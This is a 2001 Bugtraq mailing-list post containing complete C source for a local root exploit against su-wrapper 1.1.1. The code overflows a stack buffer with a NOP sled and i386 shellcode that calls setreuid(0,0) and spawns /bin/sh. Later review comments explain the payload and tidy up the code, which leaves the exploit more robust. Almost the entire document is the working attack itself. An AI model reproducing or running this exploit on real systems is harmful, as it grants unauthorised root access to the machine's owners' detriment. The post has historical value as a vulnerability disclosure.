
su-wrapper 1.1.1 Local root exploit.


Date: Wed, 06 Jun 2001 23:27:21 GMT
From: dex <dexgod@softhome.net>
To: bugtraq@securityfocus.com
Subject: su-wrapper 1.1.1 Local root exploit.

--spruceLENPOZYBKQCAEXNEOQRN
Content-Type: text/plain
Content-Transfer-Type: 8bit

/* - su-wrapper.c - */

/*************************************************************************/
/* /usr/sbin/su-wrapper(su-wrapper 1.1.1) local root exploit.            */
/*                                                                       */
/* Package Description:                                                  */
/* su-wrapper is a small utility that lets designated users run          */
/* processes under another uid/gid.                                      */
/*                                                                       */
/* Vulnerability Description:                                            */
/* If an over-long string is passed as the first argument, the program   */
/* crashes with SIGSEGV: a stack buffer overflow that this exploit uses  */
/* to overwrite the saved return address.                                */
/*                                                                       */
/* Affected: any system with su-wrapper 1.1.1 installed.                 */
/*                                                                       */
/* I don't know if other versions are vulnerable too.                    */
/*                                                                       */
/* This bug was reported to Enrico Weigelt (weigelt@nibiru.thur.de)      */
/*                                                                       */
/* Greets: NOP, dr_fdisk^, yield, vlad, dead, fatal, kuk, neuro, alt3kx, */
/* etc                                                                   */
/*        dex: dexgod@softhome.net <> http://www.raza-mexicana.org -     */
/*************************************************************************/

#include <errno.h>
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFFERSIZE 1032  /* default total length of the overflow argument built in main() */
#define OFFSET 0         /* default amount subtracted from get_sp() to guess the victim's return address */
#define ALIGN 0          /* default downward byte shift of the shellcode inside the buffer */

/*
 * Linux/i386 payload run once the overwritten return address lands in the
 * NOP sled: setreuid(0, 0) through int $0x80 (syscall 70), then
 * execve("/bin/sh", {"/bin/sh", NULL}, NULL) (syscall 11).  The jmp/call/pop
 * sequence is the usual trick for obtaining the address of the trailing
 * "/bin/sh" string without knowing where the code itself lives.
 *
 * NOTE(review): the payload writes 12 bytes just past the end of that
 * string (a NUL at +7, the argv[0] pointer at +8, the NULL argv terminator
 * at +12), so whatever follows the string in the victim's copy of the
 * argument must be writable; with ALIGN 0 those bytes are the two
 * return-address words main() appends.  The sequence contains no NUL byte,
 * so it survives being passed through argv.
 */
static char shellcode[]=
  "\x29\xc0"                             /* subl %eax, %eax   eax = 0        */
  "\xb0\x46"                             /* movb $70, %al     eax = 70       */
  "\x29\xdb"                             /* subl %ebx, %ebx   ebx = 0        */
  "\xb3\x0c"                             /* movb $12, %bl     avoid a NUL:   */
  "\x80\xeb\x0c"                         /* subb $12, %bl     ebx = 0 again  */
  "\x89\xd9"                             /* movl %ebx, %ecx   ecx = 0        */
  "\xcd\x80"                             /* int $0x80         setreuid(0,0)  */
  "\xeb\x18"                             /* jmp callz         to the call    */
  "\x5e"                                 /* popl %esi         esi = &"/bin/sh" */
  "\x29\xc0"                             /* subl %eax, %eax   eax = 0        */
  "\x88\x46\x07"                         /* movb %al, 0x07(%esi)   NUL-terminate path */
  "\x89\x46\x0c"                         /* movl %eax, 0x0c(%esi)  argv[1] = NULL     */
  "\x89\x76\x08"                         /* movl %esi, 0x08(%esi)  argv[0] = path     */
  "\xb0\x0b"                             /* movb $0x0b, %al   eax = 11       */
  "\x87\xf3"                             /* xchgl %esi, %ebx  ebx = path     */
  "\x8d\x4b\x08"                         /* leal 0x08(%ebx), %ecx  ecx = argv */
  "\x8d\x53\x0c"                         /* leal 0x0c(%ebx), %edx  edx = envp (NULL) */
  "\xcd\x80"                             /* int $0x80         execve         */
  "\xe8\xe3\xff\xff\xff"                 /* call start        pushes &"/bin/sh", back to popl */
  "\x2f\x62\x69\x6e\x2f\x73\x68";        /* "/bin/sh" (no terminator; written at run time) */

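/*
 * Return the current stack pointer (i386 target, like the rest of this file).
 *
 * The original relied on "movl %esp, %eax" leaving the value in the return
 * register of a function that has no return statement; that is undefined
 * behaviour and breaks as soon as the compiler optimises.  Read %esp through
 * a proper output operand and return it explicitly instead.  The result is
 * only a heuristic: it is sampled in the exploit's own process and used to
 * guess where the victim's stack sits, which assumes no ASLR.
 */
unsigned long get_sp(void) {
 unsigned int sp;

 __asm__ __volatile__("movl %%esp, %0" : "=r"(sp));
 return sp;
}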

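/*
 * Strictly parse a decimal command-line integer: the whole string must be
 * consumed and the value must fit in an int.  Returns 0 on success and -1 on
 * malformed input (atoi(), used originally, silently yields 0 for garbage and
 * cannot report overflow).
 */
static int parse_int_arg(const char *s, int *out) {
 char *end;
 long v;

 errno = 0;
 v = strtol(s, &end, 10);
 if (end == s || *end != '\0' || errno == ERANGE || v < INT_MIN || v > INT_MAX) {
  return -1;
 }
 *out = (int)v;
 return 0;
}

/*
 * Build the overflow string and exec the target with it as its first
 * argument.
 *
 * Usage: prog [offset] [align] [buffersize]
 *   offset      subtracted from our own stack pointer to guess the victim's
 *               return address (default OFFSET)
 *   align       shifts the shellcode down by this many bytes so the address
 *               words line up with the saved return address (default ALIGN)
 *   buffersize  total length of the argument (default BUFFERSIZE)
 *
 * Argument layout, low to high address:
 *   [NOP sled ...][shellcode][addr][addr]
 * The two trailing address words are meant to overwrite the saved return
 * address; the sled lets an imprecise guess still run into the shellcode.
 *
 * NOTE(review): this is a pre-ASLR, executable-stack, i386-only technique.
 * It cannot work with address-space randomisation, a non-executable stack
 * or a stack protector, and the address guess normally needs the offset and
 * align knobs tuned by hand.  A zero byte in addr or in the shellcode would
 * truncate the argument, since it is passed as a C string.
 *
 * Fixes over the original: int main, validated arguments, bounds check
 * before the payload writes, checked malloc, NUL-terminated argument (the
 * original never terminated it, so execl() read past the allocation),
 * fixed-width address writes instead of `long` aliasing, %lx for the
 * address, and a non-zero exit status when exec fails.
 *
 * Returns EXIT_FAILURE on bad arguments, allocation failure or exec failure;
 * on success execl() does not return.
 */
int main(int argc, char **argv) {
 unsigned long addr;
 uint32_t ret;
 char *buffer;
 size_t sc_len = strlen(shellcode);
 int buffersize = BUFFERSIZE;
 int offset = OFFSET;
 int align = ALIGN;

 if (argc > 1 && parse_int_arg(argv[1], &offset) != 0) {
  fprintf(stderr, "bad offset: %s\n", argv[1]);
  return EXIT_FAILURE;
 }
 if (argc > 2 && parse_int_arg(argv[2], &align) != 0) {
  fprintf(stderr, "bad align: %s\n", argv[2]);
  return EXIT_FAILURE;
 }
 if (argc > 3 && parse_int_arg(argv[3], &buffersize) != 0) {
  fprintf(stderr, "bad buffersize: %s\n", argv[3]);
  return EXIT_FAILURE;
 }

 /* The payload needs room for the shellcode, the alignment shift and the
  * two address words; anything smaller would make the writes below land
  * outside our own buffer. */
 if (align < 0 || buffersize < 8 ||
     (size_t)buffersize < sc_len + 8 + (size_t)align) {
  fprintf(stderr, "buffersize %d too small for align %d and a %zu-byte shellcode\n",
          buffersize, align, sc_len);
  return EXIT_FAILURE;
 }

 /* One extra byte for the terminating NUL that execl() requires. */
 buffer = malloc((size_t)buffersize + 1);
 if (buffer == NULL) {
  perror("malloc");
  return EXIT_FAILURE;
 }

 /* Same arithmetic as the original: a negative offset moves the guess up. */
 addr = get_sp() - offset;
 ret = (uint32_t)addr;

 /* NOP sled over the whole buffer, the guessed address in the last two
  * 32-bit words, and the shellcode immediately below them, shifted down by
  * align bytes.  memcpy avoids the unaligned `long` stores of the original,
  * which also wrote past buffersize when it was not a multiple of four. */
 memset(buffer, 0x90, (size_t)buffersize);
 memcpy(buffer + buffersize - 4, &ret, sizeof ret);
 memcpy(buffer + buffersize - 8, &ret, sizeof ret);
 memcpy(buffer + buffersize - 8 - sc_len - (size_t)align, shellcode, sc_len);
 buffer[buffersize] = '\0';

 printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n");
 printf("[x] su-wrapper 1.1.1 local root exploit\n");
 printf("[x] dex: - dexgod@softhome.net <> http://www.raza-mexicana.org - \n");
 printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
 printf("[x] Address = 0x%lx, Align = %d, Offset = %d\n", addr, align, offset);
 printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
 printf("[x] Exploiting...\n");
 fflush(stdout);

 /* execl() only returns on failure. */
 execl("/usr/sbin/su-wrapper", "su-wrapper", buffer, (char *)NULL);
 fprintf(stderr, "Could not start su-wrapper, /usr/sbin/su-wrapper exists? (%s)\n",
         strerror(errno));
 free(buffer);
 return EXIT_FAILURE;
}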
--spruceLENPOZYBKQCAEXNEOQRN
Content-Type: application/octet-stream; name="su-wrapper.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="su-wrapper.c"
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--spruceLENPOZYBKQCAEXNEOQRN--

